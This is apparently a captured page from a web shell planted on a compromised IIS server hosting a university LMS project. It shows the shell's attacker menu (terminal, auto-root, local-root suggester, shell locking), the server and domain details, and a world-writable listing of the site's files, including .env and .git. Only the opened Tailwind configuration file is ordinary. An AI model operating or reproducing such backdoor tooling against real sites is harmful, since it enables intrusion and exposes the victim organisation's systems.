Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 18.218.99.99
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
wwwroot /
moocs-fti /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2025-04-26 20:24
Modules
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
app
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
assets
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
bootstrap
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
config
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
database
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
lang
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
public
[ DIR ]
drwxrwxrwx
2025-04-27 12:54
resources
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
routes
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
storage
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
stubs
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
tests
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
vendor
[ DIR ]
drwxrwxrwx
2025-04-03 23:42
.DS_Store
10
KB
-rw-rw-rw-
2025-03-29 23:18
.editorconfig
258
B
-rw-rw-rw-
2024-12-11 18:24
.env
993
B
-rw-rw-rw-
2025-04-20 23:02
.env.example
114
B
-rw-rw-rw-
2025-02-19 20:56
.gitattributes
186
B
-rw-rw-rw-
2024-12-11 18:24
.gitignore
866
B
-rw-rw-rw-
2025-04-01 12:59
README.md
18
B
-rw-rw-rw-
2024-12-11 18:24
artisan
350
B
-rw-rw-rw-
2024-12-11 18:24
composer.json
2.65
KB
-rw-rw-rw-
2025-03-05 18:30
composer.lock
366.38
KB
-rw-rw-rw-
2025-03-05 18:32
modules_statuses.json
118
B
-rw-rw-rw-
2025-03-05 17:35
package-lock.json
483.57
KB
-rw-rw-rw-
2025-02-19 20:56
package.json
794
B
-rw-rw-rw-
2025-02-19 20:47
phpunit.xml
1.16
KB
-rw-rw-rw-
2024-12-11 18:24
pint.json
225
B
-rw-rw-rw-
2024-12-11 18:24
ref.md
154
B
-rw-rw-rw-
2025-03-30 02:40
tailwind.config-backend.js
5.94
KB
-rw-rw-rw-
2025-02-19 20:56
tailwind.config.js
4.38
KB
-rw-rw-rw-
2025-03-05 17:35
vite-module-loader.js
1.43
KB
-rw-rw-rw-
2024-12-11 18:24
vite.config.js
877
B
-rw-rw-rw-
2025-02-19 20:47
web.config
2.77
KB
-rw-rw-rw-
2025-04-04 00:40
Save
Rename
/** @type {import('tailwindcss').Config} */ module.exports = { content: [ "./Modules/LMS/resources/views/components/**/*.blade.php", "./Modules/LMS/resources/views/theme/**/*.blade.php", "./Modules/LMS/resources/views/theme/**/*.blade.php", "./Modules/LMS/resources/themes/**/*.blade.php", "./public/lms/frontend/assets/js/*.js", ], darkMode: "selector", mode: "jit", theme: { container: { center: true, padding: { DEFAULT: "12px", }, }, fontFamily: { mulish: "var(--font-primary)", secondary: "var(--font-secondary)", remix: ["remixicon"], }, screens: { xl: "1320px", lg: "1024px", md: "768px", sm: "640px", }, extend: { colors: { heading: "rgb(from var(--color-heading) r g b / <alpha-value>)", primary: { DEFAULT: "rgb(from var(--color-primary) r g b / <alpha-value>)", 50: "rgb(from var(--color-primary-50) r g b / <alpha-value>)", 100: "rgb(from var(--color-primary-100) r g b / <alpha-value>)", 200: "rgb(from var(--color-primary-200) r g b / <alpha-value>)", 300: "rgb(from var(--color-primary-300) r g b / <alpha-value>)", 400: "rgb(from var(--color-primary-400) r g b / <alpha-value>)", 500: "rgb(from var(--color-primary-500) r g b / <alpha-value>)", 600: "rgb(from var(--color-primary-600) r g b / <alpha-value>)", }, secondary: { DEFAULT: "rgb(from var(--color-secondary) r g b / <alpha-value>)", }, section: { DEFAULT: "rgb(from var(--color-section) r g b / <alpha-value>)", }, warning: { DEFAULT: "#FFA305", }, danger: { DEFAULT: "#FF4626", }, success: { DEFAULT: "#66CC33", }, info: { DEFAULT: "#498CFF", }, disable: { DEFAULT: "#999", }, border: { DEFAULT: "#1118271A", }, }, gridTemplateColumns: { 13: "repeat(13, minmax(0, 1fr))", }, spacing: { header: "80px", }, backgroundImage: { "text-highlighter": "url('../../assets/images/icons/text-highlighter.svg')", video: "linear-gradient(90deg, #44FF9A -0.55%, #44B0FF 22.86%, #8B44FF 48.36%, #F64 73.33%, #EBFF70 99.34%)", header: "linear-gradient(90deg, #F7F4FF 50%, #fff 50%)", "overlay-gradient": "linear-gradient(180deg, rgba(17, 24, 39, 0.00) 0%, #111827 100%)", "banner-four": "linear-gradient(90deg, #3C5F3F 0%, #16413B 100%)", "video-overlay": "linear-gradient(91deg, rgba(0, 162, 100, 0.60) 0.45%, rgba(0, 162, 100, 0.20) 83.84%)", }, keyframes: { fade: { "0%, 50%": { opacity: "0" }, "100%": { opacity: "1" }, }, pulse: { "0%": { transform: "scale(0.32)", opacity: ".8" }, "50%": { opacity: "1" }, "85%, 100%": { transform: "scale(1)", opacity: "0" }, }, reset: { "0%": { top: "-5px", opacity: "0" }, "100%": { top: "0", opacity: "1" }, }, }, boxShadow: { secondary: "30px 30px var(--color-secondary)", }, animation: { fade: "fade 0.5s ease forwards", pulse: "pulse 2s ease-in-out infinite", reset: "reset 0.3s ease forwards", }, zIndex: { backdrop: 149, modal: 150, }, }, }, plugins: [require("tailwindcss-rtl")], };